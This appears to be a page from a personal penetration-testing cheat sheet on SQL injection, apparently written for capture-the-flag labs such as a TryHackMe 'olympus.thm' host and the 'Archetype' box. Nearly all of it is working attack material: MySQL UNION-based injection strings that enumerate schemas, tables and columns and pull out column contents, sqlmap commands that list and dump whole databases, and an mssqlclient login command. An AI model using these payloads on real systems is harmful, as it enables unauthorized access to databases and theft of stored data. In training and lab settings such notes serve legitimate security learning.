MYSQL

Non Blind SQL injection

Find Databases:

' or 1=1 union SELECT distinct table_schema, table_schema FROM INFORMATION_SCHEMA.tables -- "

Table Names:

' or 1=1 union select table_schema, table_name from information_schema.tables where table_schema = "<Database Name>" -- "

Column Information:

' or 1=1 union select column_name, data_type from information_schema.columns where table_name = "<Table Name>" -- "

Retrieve multiple columns:

' or 1=1 union select concat(<Column1>, 0x0a, <Column2>, 0x0a, <Column3>) from <Table Name> -- "

SQLMap

Post Request:

sqlmap -u <URL> -dump-all -data <postparam>=

# Get a list of Databases
sqlmap -u http://olympus.thm/~webmaster/search.php --data="search=blah&submit=" --batch --dbs

# Get a list of tables on in the database
sqlmap -u http://olympus.thm/~webmaster/search.php --data="search=blah&submit=" --batch --tables -D olympus

# Dump the found database
sqlmap -u http://olympus.thm/~webmaster/search.php --data="search=blah&submit=" --batch --dump -D olympus

MSSQL

mssqlclient.py ARCHETYPE/sql_svc@<target> -windows-auth
PreviousContent DiscoveryNextBurpsuite

Last updated